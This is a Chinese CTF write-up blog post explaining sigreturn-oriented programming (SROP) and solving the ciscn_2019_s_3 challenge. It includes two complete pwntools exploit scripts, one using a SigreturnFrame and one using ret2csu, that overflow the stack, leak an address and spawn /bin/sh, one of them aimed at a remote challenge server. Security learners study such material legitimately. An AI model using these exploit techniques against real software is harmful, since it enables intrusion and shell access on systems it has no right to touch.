SROP

最新推荐文章于 2024-03-30 09:17:19 发布
最新推荐文章于 2024-03-30 09:17:19 发布
阅读量370 收藏
点赞数 1
分类专栏: pwn 二进制漏洞 CTF 文章标签: PWN CTF 二进制漏洞 缓冲区溢出 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/105336204
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

SROP

SROP可以在gadgets很少的时候的栈利用里使用,近期学习linux后,明白了程序进行系统调用时,状态会从用户态切换到内核态。而切换的实质是将用户态的寄存器保存。而返回的时候,再重新恢复用户态的寄存器。系统调用signreturn,是内核态恢复到用户态;它的具体操作是从用户的栈中弹出寄存器的值。因此,如果栈能被我们控制,然后我们能够构造signreturn的系统调用,那么就能完成利用。我们的目的就是可以借助signreturn来控制全部的寄存器。

例题ciscn_2019_s_3

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,存在一个栈溢出漏洞。

 

这里,正好我们能控制rax为0xF,x64下的linux的signreturn系统调用号正好为0xF。于是,我们便可以利用SROP来达到利用。

完整的exp

#coding:utf8
from pwn import *

context(os='linux',arch='amd64')
sh = process('./ciscn_s_3')
#sh = remote('node3.buuoj.cn',26491)
csu_call = 0x0000000000400580
csu_pop = 0x000000000040059A
mov_rax_sigreturn = 0x00000000004004DA
syscall = 0x0000000000400517
vuln = 0x00000000004004ED
pop_rdi = 0x00000000004005a3
payload = 'a'*0x10 + p64(vuln)
sh.send(payload)
sh.recv(0x20)
stack_addr = u64(sh.recv(6).ljust(8,'\x00'))
binsh_addr = stack_addr - 0x118
print 'binsh_addr=',hex(binsh_addr)
print 'stack_addr=',hex(stack_addr)

frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = binsh_addr
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall

payload = '/bin/sh'.ljust(0x10,'\x00') + p64(mov_rax_sigreturn) + p64(syscall) + str(frame)
sh.send(payload)

sh.interactive()

 

另外一种方法是ret2csu,构造execve的系统调用。这里正好rax能够控制为0x3B,x64下对应的系统调用为execve。

于是解法二完整的exp为

#coding:utf8
from pwn import *

#context.log_level = 'debug'
#sh = process('./ciscn_s_3')
sh = remote('node3.buuoj.cn',26491)
csu_call = 0x0000000000400580
csu_pop = 0x000000000040059A
mov_rax_execvecall = 0x00000000004004E2
syscall = 0x0000000000400517
vuln = 0x00000000004004ED
pop_rdi = 0x00000000004005a3
payload = 'a'*0x10 + p64(vuln)
sh.send(payload)
sh.recv(0x20)
stack_addr = u64(sh.recv(6).ljust(8,'\x00'))
binsh_addr = stack_addr - 0x118
print 'binsh_addr=',hex(binsh_addr)
print 'stack_addr=',hex(stack_addr)
payload = '/bin/sh'.ljust(0x10,'\x00') + p64(csu_pop)
payload += p64(0) #rbx
payload += p64(1) #rbp
#该存存放syscall指令的地址
payload += p64(stack_addr - 0xC0) #r12
payload += p64(0)*3
payload += p64(mov_rax_execvecall)
payload += p64(csu_call)
#r12指向这里的rop
payload += p64(pop_rdi) + p64(binsh_addr)
payload += p64(syscall)
sh.send(payload)

sh.interactive()

 

ha1vk
关注
专栏目录
关于对SROP详解
stopys6的博客
09-08 588
在打NepCTF2023的时候,pwn的第一题就是srop,但是我发现我好像没学hhh,当时比赛的时候恶补了一下,赛后整理一下写一篇文章吧。SROP全称为(Sigreturn Oriented Programming),在ctfwiki中将其归类为了高级ROP,其中,sigreturn是一个系统调用,在类 unix 系统发生 signal 的时候会被间接地调用,其实就是利用了linux中的系统调用号,利用linux下的15号系统调用号调用->rt_sigreturn。
SROP(Sigreturn Oriented Programming)
菊花的老窝
05-04 746
如图所示,当有中断或异常产生时,内核会向某个进程发送一个 signal,该进程被挂起并进入内核(1),然后内核为该进程保存相应的上下文,然后跳转到之前注册好的 signal handler 中处理相应的 signal(2),当 signal handler 返回后(3),内核为该进程恢复之前保存的上下文,最终恢复进程的执行(4)。会从用户栈上恢复恢复所有寄存器的值,而用户栈是保存在用户进程的地址空间中的,是用户进程可读写的。和其他的系统调用串起来,形成一个链,从而达到任意代码执行的目的。
SROP 学习笔记
Assassin
05-14 913
文章目录一、基本介绍二、signal 机制三、攻击原理四、SROP chain的构造五、关于利用六、例题讲解 本文只是学习的记录文章,主要是以CTF wiki为主,然后加上例题讲解。 一、基本介绍 SROP(Sigreturn Oriented Programming) 于 2014 年被 Vrije Universiteit Amsterdam 的 Erik Bosman 提出,其相关研究Framing Signals — A Return to Portable Shellcode发表在安全顶级会议
MSE.zip_MSE-SROP_carrier_carrier mse_matlab mse_ofdm
09-24
标题"MSE.zip_MSE-SROP_carrier_carrier mse_matlab mse_ofdm"涉及到的主要知识点是关于无线通信中的误差性能评估,特别是针对正交频分复用(OFDM)系统。描述提到的是一个基于平均平方误差(Mean Square Error,MSE...
SROP基本原理和利用
MillionSky的专栏
03-19 6915
1 概述SROP: Sigreturn Oriented Programming ,系统Signal Dispatch之前会将所有寄存器压入栈,然后调用signal handler,signal handler返回时会将栈的内容还原到寄存器。 如果事先填充栈,然后直接调用signal handler,那在返回的时候就可以控制寄存器的值。2 资源1. Framing Signals—A Return...
pwntools--SROP工具类SigreturnFrame使用详解
lifanxin的博客
03-25 2182
SROP--SigreturnFrame概念SigreturnFrame的使用一个例子程序分析漏洞利用wp总结 概念 这里简单介绍下SROP的概念,主要是帮助读者理解和使用pwntools提供的SigreturnFrame工具实现漏洞利用。 我们都知道ROP吧,即利用.text段中的gadgets,这些gadgets都以ret指令作为结尾,以此串联起来实现我们想要的系统调用进而达到获取目标主机shell的目的。那么如何判断是哪种系统调用呢?这里是根据寄存器的值来进行判断的,只要将相应的寄存器值设置为对应参数
SROP 32位--Fun with SROP Exploitation
MillionSky的专栏
03-19 403
1 概述本文是这篇文章的笔记:Fun with SROP Exploitationhttps://v0ids3curity.blogspot.jp/2015/06/fun-with-srop-exploitation.html 环境:Ubuntu 16.042 程序nasm -felf32 vuln_s.asmld vuln_s.o -melf_i386 -o vuln_s millionsky@...
SROP简单介绍和例题
qq_45595732的博客
03-02 3939
SROP本质是 sigreturn 这个系统调用,主要是将所有寄存器压入栈中,以及压入 signal 信息,以及指向 sigreturn 的系统调用地址。 对于 signal Frame 来说,会因为架构的不同而有所区别,这里给出分别给出 x86 以及 x64 的 sigcontext 。 x86 struct sigcontext { unsigned short gs, __gsh; unsigned short fs, __fsh; unsigned short es, __esh;
萌新学pwnSROP
qq_36495104的博客
05-22 879
这篇文章主要是讲解对ctf-wiki上面的SROP的例子的理解,题目是360ctf的一个题目 代码很简单 .text:00000000004000B0 public start .text:00000000004000B0 start proc near ; DATA XREF: LOAD:0000000000400018↑o .text:00000000004000B0 xor rax,
SROP相关知识和例题
最新发布
qq_60209620的博客
03-30 1776
参考书籍:《CTF权威指南(PWN篇)》
SROP 32位DEMO
MillionSky的专栏
03-19 538
1 概述开始学习SROP技巧。希望找到一个简单的demo来了解SROP。找了很多资料,但都没有实作成功。主要参考这篇文章1. Sigreturn Oriented Programming攻击简介https://www.anquanke.com/post/id/85810直接拿原文中的程序测试,没有复现成功,主要的问题有:1. VDSO的爆破不成功,GDB调试发现对应的位置没有找到对应的指令:sig...
SROP 64位-smallest(2017429ctf.ichunqiu)
MillionSky的专栏
03-19 1227
1 概述360春秋杯”国际网络安全挑战赛Challenge - smallest (pwn 300) - 429 ichunqiu ctf 2017http://2017429ctf.ichunqiu.com/competition/index 64位SROP很好的练习题。2 程序分析millionsky@ubuntu-16:~/tmp/smallest$ objdump -d smallest ...
Linux pwn入门教程(8)——SROP
子曰小玖的博客
06-04 1619
https://bbs.ichunqiu.com/thread-44068-1-1.html 0x00 SROP应用场景与原理 SROP是一个于2014年被发表在信安顶会Okaland 2014上的文章提出的一种攻击方式,相信很多读者对这个方式的了解都源于freebuf上的这篇文章'http://www.freebuf.com/articles/network/87447.html'。 正如这...
SROP的一个实例
weixin_30908649的博客
04-21 135
以前一直只是大概看过这种技术,没实践过,今天刚好遇到一道题,实践了一波,确实很方便 unmoxiao@cat ~/s/pd_ubuntu> r2 -A smallest 00:54:15 Warning: Cannot in...
SROP简单姿势学习-Ciscn_s_3
aptx4869_li的博客
08-06 520
解题思路 安全机制检查 healer@healer-virtual-machine:~/Desktop/ciscn_s_3$ readelf -h ciscn_s_3 ELF Header: Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 Class: ELF64 Data: 2's complement, lit
SROP利用技术
weixin_33874713的博客
05-12 224
上个周末的“红帽杯”结束了,战队成绩很不错,排名前几。不过有些题目是临时参考网上的思路解出来的,虽然得了分,但当时不是很理解。比赛完了把当时不太熟悉的题目回顾了一下,作为思路的总结和后续的参考。 本篇是针对pwn4的总结。 知道不知道是一种很让人满足的感觉,自己解出题目后,不由得感叹安全研究人员思路的巧妙。拿到PWN4后,在IDA中看了下: 程序非常简短,运行程序后会等待用户输入...
srop的基本原理是什么
03-03
SROP(Sigreturn-Oriented Programming)是一种利用信号处理函数(signal handler)来执行攻击代码的技术。攻击者通过利用程序中的漏洞,将程序状态中的寄存器值篡改成指向一个虚假的信号处理函数,并且在这个虚假的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值